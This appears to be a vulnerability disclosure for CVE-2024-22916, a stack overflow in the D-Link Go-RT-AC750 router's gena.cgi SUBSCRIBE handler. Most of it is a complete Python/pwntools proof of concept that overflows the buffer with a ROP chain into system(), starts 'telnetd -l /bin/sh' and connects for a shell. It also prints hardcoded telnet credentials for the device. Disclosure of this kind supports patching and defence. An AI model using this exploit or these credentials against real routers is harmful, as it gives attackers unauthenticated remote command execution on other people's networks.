CVE-2024-22916

Product:

D-LINK Go-RT-AC750

Version:

v101b03

Firmware download address :

https://eu.dlink.com/uk/en/products/go-rt-ac750-wireless-ac750-dual-band-easy-router

Vulnerability Description:

The sprintf function in the sub_40E700 function within the cgibin is susceptible to stack overflow through concatenation, leading to arbitrary command execution.

POC

Execute the commands telnetd -l /bin/sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from pwn import *
from socket import *
from os import *
from time import *
context(os = 'linux', arch = 'mips',log_level='debug',endian = 'big')
s = socket(AF_INET, SOCK_STREAM)
s.connect((gethostbyname("192.168.0.1"), 49152))
libc_base = 0x77f6c000
system_addr = 0x52510
cmd = b'telnetd -l /bin/sh;'
payload = 449*b'a'
payload += b'b'*4                         
payload += b'b'*4                         
payload += b'b'*4                         
payload += b'b'*4                         
payload += p32(0x0001A6DC+ libc_base)    
payload += p32(system_addr + libc_base)                      
payload += b'b'*4                         
payload += b'b'*4                         
payload += p32(0x0002468C + libc_base)      
payload +=b'c'*88
payload += cmd
msg = b"SUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
msg += b"Host: localhost:49152\r\n"
msg += b"SID: 1\r\n"
msg += b"Timeout: Second-2333\r\n\r\n"
s.send(msg)
sleep(1)    
system("telnet 192.168.0.1 23")

effect

1

user,Password

1
2
Alphanetworks
wrgac18_dlob.hans_ac750

2

Analysis

In the genacgi_main function, the SUBSCRIBE section contains functions with the sprintf function, leading to a stack overflow when concatenating strings.

3

4

CVE
#Stack overflow
CVE-2024-22916
https://kee02p.github.io/2024/01/13/CVE-2024-22916/
作者
Kee02p
发布于
2024年1月13日
许可协议